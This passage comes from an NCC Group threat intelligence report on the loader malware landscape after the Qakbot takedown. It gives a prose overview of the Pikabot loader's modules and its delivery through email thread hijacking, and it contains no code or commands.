Law enforcement operations can have a severe and abrupt impact on the threat landscape, putting pressure on threat actors to expand and adapt their toolsets to minimize business interruption. Operation Duck Hunt in 2023 that knocked an extremely prolific loader malware family, Qakbot, off its throne is one of such changes. This shift in landscape tends to attract the attention of certain threat intelligence analysts; and so, due to Qakbot’s popularity and its subsequent downfall, these certain threat intelligence analysts at NCC Group became interested in proactively monitoring potential increases in the usage of similar loaders. Should Qakbot’s departure from the playing field have left a vacuum, which competitor would rise up to the challenge now that the tool’s infrastructure has been seized? And so, while law enforcement silently toiled to disrupt, we silently turned to digging. Loader malware is a pivotal, expensive, and powerful entry vector that secures its place in the victim’s systems. Loaders serve a wide range of other malware operators (including other loaders), making sure that initial stages of crime run smoothly, making them high priority investigation targets. After all, from the defending perspective, one would much rather close off the entry points for malicious activity as early as possible instead of dealing with the fallout within the core systems. Our research preemptively started with a close investigation of the Pikabot loader, a trojan that emerged in May 2023 that was deemed a likely match for Qakbot. The new addition to the loader market exhibited multiple resemblances to Qakbot from the beginning of its career. The eerily similar way both loaders were spreading during their respective campaigns by what is thought to be one specific affiliate by the security research community.
This annual Spotlight would like to take you for a fly- by through our investigation of the loader landscape step by step, starting with getting cozy with our new malware friend Pikabot, continuing to the tall grass hunt for more specimen like it, and the woes of collecting malware data from the Wild Wide Web.
Pikabot overview
Before embarking on looking for traces of Qakbot’s competitor activity, we had to get up close and friendly with our potential targets in order to understand how they tick and how to go about looking for more. Pikabot is a new loader type malware that emerged in early 2023. In its early stages, the loader’s purpose was fetching additional malware. Like Qakbot, the loader consists of three main modular components. The loader component is used to drop secondary payloads on infected systems and downloads the malicious DLL. The code injector is used to decrypt and inject the core module. Finally, the core module is responsible for communicating with the C2 servers; retrieving and injecting malicious payloads from the C2; executing remote commands and code injection. In recent campaigns Cobalt Strike has been used to facilitate the further compromise of the infected system and network. Pikabot shares similarities with Qakbot including the distribution methods, campaigns, and malware behavior. E-mail thread hijacking is used to attempt to lure the target to interact with a password protected ZIP file. When this happens, curl is used to download Pikabot, which collects some basic level information like the current user and system network details.
61
Made with FlippingBook - PDF hosting